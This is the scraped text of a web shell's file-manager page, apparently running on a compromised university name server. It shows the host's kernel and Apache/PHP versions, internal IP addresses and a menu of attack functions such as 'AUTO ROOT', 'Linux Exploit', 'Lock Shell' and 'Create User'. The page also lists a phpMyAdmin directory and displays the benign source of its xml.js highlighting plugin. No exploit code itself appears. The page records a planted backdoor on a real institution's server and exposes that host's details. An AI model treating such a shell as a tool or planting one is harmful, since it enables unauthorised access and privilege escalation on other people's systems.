Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
js /
transformations /
[ HOME SHELL ]
Name
Size
Permission
Action
image_upload.js
831
B
-rwxrwxr-x
json_editor.js
476
B
-rwxrwxr-x
json.js
668
B
-rwxrwxr-x
sql_editor.js
312
B
-rwxrwxr-x
xml_editor.js
412
B
-rwxrwxr-x
xml.js
664
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xml.js
/* vim: set expandtab sw=4 ts=4 sts=4: */ /** * XML syntax highlighting transformation plugin */ AJAX.registerOnload('transformations/xml.js', function() { var $elm = $('#page_content').find('code.xml'); $elm.each(function () { var $json = $(this); var $pre = $json.find('pre'); /* We only care about visible elements to avoid double processing */ if ($pre.is(":visible")) { var $highlight = $('<div class="xml-highlight cm-s-default"></div>'); $json.append($highlight); CodeMirror.runMode($json.text(), 'application/xml', $highlight[0]); $pre.hide(); } }); });
Close